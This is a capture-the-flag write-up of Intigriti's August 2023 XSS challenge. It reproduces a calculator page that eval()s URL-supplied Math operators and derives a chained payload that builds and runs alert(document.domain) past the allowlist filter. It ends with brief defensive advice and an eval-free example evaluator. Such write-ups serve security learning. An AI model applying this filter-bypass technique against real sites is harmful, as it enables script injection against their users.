@Siss3l
Last active April 15, 2024 18:30
Intigriti's August 2023 Web challenge thanks to @aszx87410

Intigriti August Challenge

  • Category: Web
  • Impact: Medium
  • Solves: ~10

Challenge

Description

Find a way to execute alert(document.domain) on the challenge page.

The solution:

  • Should work on the latest version of Chrome and Firefox.
  • Should execute alert(document.domain).
  • Should leverage a cross site scripting vulnerability on this domain.
  • Shouldn't be self-XSS or related to MiTM attacks.
  • Should NOT use another challenge on the intigriti.io domain.
  • Should require no user interaction.

Overview

For this August challenge, the page shows what looks like a simple calculator interface:

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>
    <title>Pure Functional Math Calculator</title>
    <style>
      body {
        background-color: #DFDBE5;
        background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 304 304' width='304' height='304'%3E%3Cpath fill='%239C92AC' fill-opacity='0.4' d='M44.1 224a5 5 0 1 1 0 2H0v-2h44.1zm160 48a5 5 0 1 1 0 2H82v-2h122.1zm57.8-46a5 5 0 1 1 0-2H304v2h-42.1zm0 16a5 5 0 1 1 0-2H304v2h-42.1zm6.2-114a5 5 0 1 1 0 2h-86.2a5 5 0 1 1 0-2h86.2zm-256-48a5 5 0 1 1 0 2H0v-2h12.1zm185.8 34a5 5 0 1 1 0-2h86.2a5 5 0 1 1 0 2h-86.2zM258 12.1a5 5 0 1 1-2 0V0h2v12.1zm-64 208a5 5 0 1 1-2 0v-54.2a5 5 0 1 1 2 0v54.2zm48-198.2V80h62v2h-64V21.9a5 5 0 1 1 2 0zm16 16V64h46v2h-48V37.9a5 5 0 1 1 2 0zm-128 96V208h16v12.1a5 5 0 1 1-2 0V210h-16v-76.1a5 5 0 1 1 2 0zm-5.9-21.9a5 5 0 1 1 0 2H114v48H85.9a5 5 0 1 1 0-2H112v-48h12.1zm-6.2 130a5 5 0 1 1 0-2H176v-74.1a5 5 0 1 1 2 0V242h-60.1zm-16-64a5 5 0 1 1 0-2H114v48h10.1a5 5 0 1 1 0 2H112v-48h-10.1zM66 284.1a5 5 0 1 1-2 0V274H50v30h-2v-32h18v12.1zM236.1 176a5 5 0 1 1 0 2H226v94h48v32h-2v-30h-48v-98h12.1zm25.8-30a5 5 0 1 1 0-2H274v44.1a5 5 0 1 1-2 0V146h-10.1zm-64 96a5 5 0 1 1 0-2H208v-80h16v-14h-42.1a5 5 0 1 1 0-2H226v18h-16v80h-12.1zm86.2-210a5 5 0 1 1 0 2H272V0h2v32h10.1zM98 101.9V146H53.9a5 5 0 1 1 0-2H96v-42.1a5 5 0 1 1 2 0zM53.9 34a5 5 0 1 1 0-2H80V0h2v34H53.9zm60.1 3.9V66H82v64H69.9a5 5 0 1 1 0-2H80V64h32V37.9a5 5 0 1 1 2 0zM101.9 82a5 5 0 1 1 0-2H128V37.9a5 5 0 1 1 2 0V82h-28.1zm16-64a5 5 0 1 1 0-2H146v44.1a5 5 0 1 1-2 0V18h-26.1zm102.2 270a5 5 0 1 1 0 2H98v14h-2v-16h124.1zM242 149.9V160h16v34h-16v62h48v48h-2v-46h-48v-66h16v-30h-16v-12.1a5 5 0 1 1 2 0zM53.9 18a5 5 0 1 1 0-2H64V2H48V0h18v18H53.9zm112 32a5 5 0 1 1 0-2H192V0h50v2h-48v48h-28.1zm-48-48a5 5 0 0 1-9.8-2h2.07a3 3 0 1 0 5.66 0H178v34h-18V21.9a5 5 0 1 1 2 0V32h14V2h-58.1zm0 96a5 5 0 1 1 0-2H137l32-32h39V21.9a5 5 0 1 1 2 0V66h-40.17l-32 32H117.9zm28.1 90.1a5 5 0 1 1-2 0v-76.51L175.59 80H224V21.9a5 5 0 1 1 2 0V82h-49.59L146 112.41v75.69zm16 32a5 5 0 1 1-2 0v-99.51L184.59 96H300.1a5 5 0 0 1 3.9-3.9v2.07a3 3 0 0 0 0 5.66v2.07a5 5 0 0 1-3.9-3.9H185.41L162 
121.41v98.69zm-144-64a5 5 0 1 1-2 0v-3.51l48-48V48h32V0h2v50H66v55.41l-48 48v2.69zM50 53.9v43.51l-48 48V208h26.1a5 5 0 1 1 0 2H0v-65.41l48-48V53.9a5 5 0 1 1 2 0zm-16 16V89.41l-34 34v-2.82l32-32V69.9a5 5 0 1 1 2 0zM12.1 32a5 5 0 1 1 0 2H9.41L0 43.41V40.6L8.59 32h3.51zm265.8 18a5 5 0 1 1 0-2h18.69l7.41-7.41v2.82L297.41 50H277.9zm-16 160a5 5 0 1 1 0-2H288v-71.41l16-16v2.82l-14 14V210h-28.1zm-208 32a5 5 0 1 1 0-2H64v-22.59L40.59 194H21.9a5 5 0 1 1 0-2H41.41L66 216.59V242H53.9zm150.2 14a5 5 0 1 1 0 2H96v-56.6L56.6 162H37.9a5 5 0 1 1 0-2h19.5L98 200.6V256h106.1zm-150.2 2a5 5 0 1 1 0-2H80v-46.59L48.59 178H21.9a5 5 0 1 1 0-2H49.41L82 208.59V258H53.9zM34 39.8v1.61L9.41 66H0v-2h8.59L32 40.59V0h2v39.8zM2 300.1a5 5 0 0 1 3.9 3.9H3.83A3 3 0 0 0 0 302.17V256h18v48h-2v-46H2v42.1zM34 241v63h-2v-62H0v-2h34v1zM17 18H0v-2h16V0h2v18h-1zm273-2h14v2h-16V0h2v16zm-32 273v15h-2v-14h-14v14h-2v-16h18v1zM0 92.1A5.02 5.02 0 0 1 6 97a5 5 0 0 1-6 4.9v-2.07a3 3 0 1 0 0-5.66V92.1zM80 272h2v32h-2v-32zm37.9 32h-2.07a3 3 0 0 0-5.66 0h-2.07a5 5 0 0 1 9.8 0zM5.9 0A5.02 5.02 0 0 1 0 5.9V3.83A3 3 0 0 0 3.83 0H5.9zm294.2 0h2.07A3 3 0 0 0 304 3.83V5.9a5 5 0 0 1-3.9-5.9zm3.9 300.1v2.07a3 3 0 0 0-1.83 1.83h-2.07a5 5 0 0 1 3.9-3.9zM97 100a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-48 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 96a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-144a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 
0 0 0 0 6zm-96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM49 36a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM33 68a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 240a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm80-176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm112 176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 180a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 84a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6z'%3E%3C/path%3E%3C/svg%3E");
      }
      main {
        max-width: 750px;
        margin: 64px auto;
        text-align: center;
        background: rgba(255,255,255,0.85);
        padding: 8px 16px;
        border-radius: 16px;
      }
      .container {
        display: flex;
        justify-content: center;
      }
      .stack-block {
        max-height: 500px;
        overflow: auto;
        box-sizing: border-box;
        width: 200px;
        min-height: 150px;
        border-width: 1px;
        border-style: solid; 
      }
      .stack-block div {
        padding: 4px;
        background: aliceblue;
        border-bottom: 1px solid;
        word-break: break-word;
      }
      .wrapper{
        width: 400px;
        padding: 10px;
        border-width: 1px;
        border-style: solid; 
        border-color: #DDDDDD;
        margin-right: 12px;
      }
      .result{
        box-sizing: border-box;
        width: 400px;
        padding: 12px;
        min-height: 150px;
        border-width: 1px;
        border-style: solid; 
        border-color: #CCCCCC;
        text-align: right;
        font-family: sans-serif;
        font-size: 24px;
        color: #3c3c3c;
        word-break: break-word;
      }
      .row{
        display: flex;
        justify-content: space-between;
      }
      .row > button{
        width: 94px;
        height: 36px;
        display: inline-block;
        margin-top: 6px;
        border-width: 1px;
        border-style: solid; 
        border-color: #CCCCCC;
        font-size: 16px;
        color: #3c3c3c;
      }
      .row > button:hover{
        cursor: pointer;
        border-color: #AAAAAA;
      }
      .btn-fn{
        background: #FFFFFF;
      }
      .btn-equal{
        background: #ff8d00;
        border-style: none;
      }
      .btn-equal:hover{
        background: #ea8200;
      }
    </style>
  </head>
  <body>
    <main>
      <h1>Pure Functional Math Calculator</h1>
      <div class="container">
        <div class="wrapper">
          <div class="result">Math.random()</div>
          <div class="pad">
            <div class="row">
              <button class="btn-ac">AC</button>
            </div>
            <div class="row">
              <button class="btn-fn">sin</button>
              <button class="btn-fn">cos</button>
              <button class="btn-fn">tan</button>
              <button class="btn-fn">floor</button>
            </div>
            <div class="row">
              <button class="btn-fn">acos</button>
              <button class="btn-fn">asin</button>
              <button class="btn-fn">atan</button>
              <button class="btn-fn">ceil</button>
            </div>
            <div class="row">
              <button class="btn-fn">cosh</button>
              <button class="btn-fn">sinh</button>
              <button class="btn-fn">tanh</button>
              <button class="btn-fn">round</button>
            </div>
            <div class="row">
              <button class="btn-share">share</button>
              <button class="btn-equal">=</button>
            </div>
          </div>
        </div>
        <div class="stack-block">
          <div>1. Math.random</div>
        </div>
      </div>
    </main>
    <script>
      (function(){
        name = 'Pure Functional Math Calculator'
        let next;
        Math.random = function () {
          if (!this.seeds) {
            this.seeds = [0.62536, 0.458483, 0.544523, 0.323421, 0.775465]
            next = this.seeds[new Date().getTime() % this.seeds.length]
          }
          next = next * 1103515245 + 12345
          return (next / 65536) % 32767
        }
        console.assert(Math.random() > 0)
        const result = document.querySelector('.result')
        const stack = document.querySelector('.stack-block')
        let operators = []
        document.querySelector('.pad').addEventListener('click', handleClick)
        let qs = new URLSearchParams(window.location.search)
        if (qs.get('q')) {
          const ops = qs.get('q').split(',')
          if (ops.length >= 100) {
            alert('Max length of array is 99, got:' + ops.length)
            return init()
          }
          for(let op of ops) {
            if (!op.startsWith('Math.')) {
              alert(`Operator should start with Math.: ${op}`)
              return init()
            }
            if (!/^[a-zA-Z0-9.]+$/.test(op)) {
              alert(`Invalid operator: ${op}`)
              return init()
            }
          }
          for(let op of ops) {
            addOperator(op)
          }
          calculateResult()
        } else {
          init()
        }
        function init() {
          addOperator('Math.random')
        }
        function addOperator(name) {
          result.innerText = `${name}(${result.innerText})`
          operators.push(name)
          let div = document.createElement('div')
          div.textContent = `${operators.length}. ${name}`
          stack.prepend(div)
        }
        function calculateResult() {
          result.innerText = eval(result.innerText)
        }
        function handleClick(e) {
          let className = e.target.className
          let text = e.target.innerText
          if (className === 'btn-fn') {
            addOperator(`Math.${text}`)
          } else if (className === 'btn-ac') {
            result.innerText = 'Math.random()';
            stack.innerHTML = '<div>1. Math.random</div>'
            operators = ['Math.random']
          } else if (className === 'btn-share'){
            alert('Please copy the URL!')
            location.search = '?q=' + operators.join(',')
          } else if (className === 'btn-equal') {
            calculateResult()
          }
        }
      })()
    </script>
  </body>
</html>

We must keep in mind that every operator (fewer than 100 of them) has to start with Math. and may contain only characters matching /^[a-zA-Z0-9.]+$/, i.e. letters, digits and dots.

Note that the Math.seeds array contains 5 floating-point numbers, the same count as the 5 letters of the word alert, which catches our attention!

The eval() function evaluates code represented as a string and returns its completion value, so we soon realize that there's a flaw with the use of eval here:

function calculateResult() {
    result.innerText = eval(result.innerText)
}

Introspection

By fiddling with the URL parameter q and reading the documentation of the Math global object, we wonder whether there might be an underlying problem.

The value q=Math.cos returns NaN (the global property representing Not-A-Number).

The value q=Math.E returns the following error:

VM170:1 Uncaught TypeError: Math.E is not a function
    at eval (eval at calculateResult (index.html:64:30), <anonymous>:1:6)
    at calculateResult (index.html?q=Math.E:211:30)
    at index.html?q=Math.E:192:11
    at index.html?q=Math.E:231:9

Solution

Without much surprise, we understand that we need to chain Math's properties and methods, together with the seeds array, to build an alert, since Math.constructor.constructor.call.call(Math.constructor.constructor('alert(document.domain)')) is the intended target.

There are various code-golf approaches to achieve this, but we will focus on what comes to mind after reading a few articles:

Expressions                                                                                                       Value

- Math.abs.name                                                                                                   'abs'
    .constructor.fromCharCode(                                                                                      '('
      Math.round(                                                                                                   40
        Math.exp(                                                                                    40.46509368441047
          Math.log2(                                                                                 3.700439718141092
            Math.isPrototypeOf.name                                                                    'isPrototypeOf'
              .length.valueOf()                                                                                     13
          )
        )
      )
    )
- Math.constructor.constructor.call.call                                                     ƒ call() { [native code] }
- Math.constructor.constructor                                                           ƒ Function() { [native code] }
- Math.abs.name.at(Math.valueOf())                                                                                  'a'
- Math.log.name.at()                                                                                                'l'
- Math.exp.name.at()                                                                                                'e'
- Math.round.name.at()                                                                                              'r'
- Math.tan.name.at()                                                                                                't'
- Math.abs.name.constructor.fromCharCode(Math.round(Math.exp(Math.log2(Math.isPrototypeOf.name.length.valueOf())))) '('
- Math.round.name.at(Math.acos.name.length.valueOf())                                                               'd'
- Math.floor.name.at(Math.E.toFixed())                                                                              'o'
- Math.cos.name.at()                                                                                                'c'
- Math.fround.name.at(Math.E.toFixed())                                                                             'u'
- Math.max.name.at()                                                                                                'm'
- Math.exp.name.at()                                                                                                'e'
- Math.min.name.at(Math.abs.name.at.name.length.valueOf())                                                          'n'
- Math.tan.name.at()                                                                                                't'
- Math.abs.name.constructor.fromCharCode(Math.round(Math.log2(Math.expm1(Math.clz32()))))                           '.'
- Math.round.name.at(Math.acos.name.length.valueOf())                                                               'd'
- Math.floor.name.at(Math.E.toFixed())                                                                              'o'
- Math.max.name.at()                                                                                                'm'
- Math.abs.name.at()                                                                                                'a'
- Math.imul.name.at()                                                                                               'i'
- Math.min.name.at(Math.abs.name.at.name.length.valueOf())                                                          'n'
- Math.abs.name.constructor.fromCharCode(Math.ceil(Math.exp(Math.log2(Math.isPrototypeOf.name.length.valueOf()))))  ')'

Don't forget that the expressions have to be chained through valueOf (the Object method that returns the this value converted to an object), since every operator in the chain receives the previous result as its argument.

[Image: Meme]

This then gives us a working alert in the web console:

>>> 
Math.constructor.constructor.call.call(
  Math.constructor.constructor(
    Math.seeds.join(
      Math.seeds.constructor.prototype.join(
        Math.seeds.push(
          Math.abs.name.constructor.fromCharCode(
            Math.ceil(
              Math.exp(
                Math.log2(
                  Math.isPrototypeOf.name.length.valueOf(
        Math.seeds.push(
          Math.min.name.at(
            Math.abs.name.at.name.length.valueOf(
        Math.seeds.push(
          Math.imul.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.abs.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.max.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.floor.name.at(
            Math.E.toFixed(
              Math.valueOf(
        Math.seeds.push(
          Math.round.name.at(
            Math.acos.name.length.valueOf(
        Math.seeds.push(
          Math.abs.name.constructor.fromCharCode(
            Math.round(
              Math.log2(
                Math.expm1(
                  Math.clz32(
                    Math.valueOf(
        Math.seeds.push(
          Math.tan.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.min.name.at(
            Math.abs.name.at.name.length.valueOf(
        Math.seeds.push(
          Math.exp.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.max.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.fround.name.at(
            Math.E.toFixed(
              Math.valueOf(
        Math.seeds.push(
          Math.cos.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.floor.name.at(
            Math.E.toFixed(
              Math.valueOf(
        Math.seeds.push(
          Math.round.name.at(
            Math.acos.name.length.valueOf(
        Math.seeds.push(
          Math.abs.name.constructor.fromCharCode(
            Math.round(
              Math.exp(
                Math.log2(
                  Math.isPrototypeOf.name.length.valueOf(
        Math.seeds.push(
          Math.tan.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.round.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.exp.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.log.name.at(
            Math.valueOf(
        Math.seeds.push(
          Math.abs.name.at(
        Math.seeds.pop(
          Math.seeds.pop(
            Math.seeds.pop(
              Math.seeds.pop(
                Math.seeds.pop(
                  Math.seeds.pop)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
<<< Math.constructor.constructor.call.call(Math.constructor.constructor('alert(document.domain)'));

All that is left to do is to reverse the order of the lines (joined with commas instead of opening parentheses) and remove the superfluous brackets, as here:

[Screenshot: Alert]

Defense

Be careful with eval, especially without a Content Security Policy.
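As an added example that is not part of the challenge or of this write-up, the following Node script models the calculator's operator check (the Math. prefix plus the /^[a-zA-Z0-9.]+$/ allowlist) next to an eval-free evaluator that resolves operators against an explicit function allowlist; ALLOWED_FUNCTIONS mirrors the buttons on the page, and safeEvaluate is an assumed replacement for calculateResult rather than code from the challenge.

```javascript
// Added example (not part of the challenge or the write-up): a Node model of the
// calculator's operator check next to an eval-free evaluator for the same feature.

// The challenge's own rule: fewer than 100 operators, each starting with "Math."
// and made only of letters, digits and dots. Nothing here says which property
// walk is acceptable, so "Math.constructor.constructor" passes as easily as "Math.cos".
function passesChallengeCheck(ops) {
  if (ops.length >= 100) return false;
  return ops.every((op) => op.startsWith('Math.') && /^[a-zA-Z0-9.]+$/.test(op));
}

// How the page builds the string handed to eval(): every operator wraps the previous
// one, so the first operator in q= ends up innermost.
function composeExpression(ops, seed = 'Math.random()') {
  return ops.reduce((inner, op) => `${op}(${inner})`, seed);
}

// Hardened variant (assumed replacement for calculateResult): no eval at all.
// Operators are resolved against an explicit allowlist of the unary Math functions
// the buttons expose, and the functions are called directly on the running value.
// A dotted walk such as Math.seeds.pop or Math.constructor.constructor cannot
// match the single-identifier pattern, whatever the regex above thinks of it.
const ALLOWED_FUNCTIONS = new Set([
  'sin', 'cos', 'tan', 'floor', 'acos', 'asin', 'atan', 'ceil',
  'cosh', 'sinh', 'tanh', 'round',
]);

function safeEvaluate(ops, start) {
  if (ops.length >= 100) throw new Error(`Too many operators: ${ops.length}`);
  let value = start;
  for (const op of ops) {
    const match = /^Math\.([a-z0-9]+)$/.exec(op); // exactly one identifier after "Math."
    if (!match || !ALLOWED_FUNCTIONS.has(match[1])) {
      throw new Error(`Operator not allowed: ${op}`);
    }
    value = Math[match[1]](value);
  }
  return value;
}

// Convenience wrapper returning null instead of throwing, for callers that only need a verdict.
function safeEvaluateOrNull(ops, start) {
  try {
    return safeEvaluate(ops, start);
  } catch (err) {
    return null;
  }
}

// Constructed operator lists: a legitimate one and the kind of property walk the
// write-up chains. The lax check accepts both; the allowlist accepts only the first.
const legit = ['Math.cos', 'Math.floor'];
const propertyWalk = ['Math.seeds.pop', 'Math.abs.name.at', 'Math.constructor.constructor'];
console.log(passesChallengeCheck(legit), passesChallengeCheck(propertyWalk)); // true true
console.log(composeExpression(legit));            // Math.floor(Math.cos(Math.random()))
console.log(safeEvaluateOrNull(legit, 0));        // 1
console.log(safeEvaluateOrNull(propertyWalk, 0)); // null
```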

Appendix

This challenge is not inspired by a real-world bug, but it was quite a fun puzzle to start with!
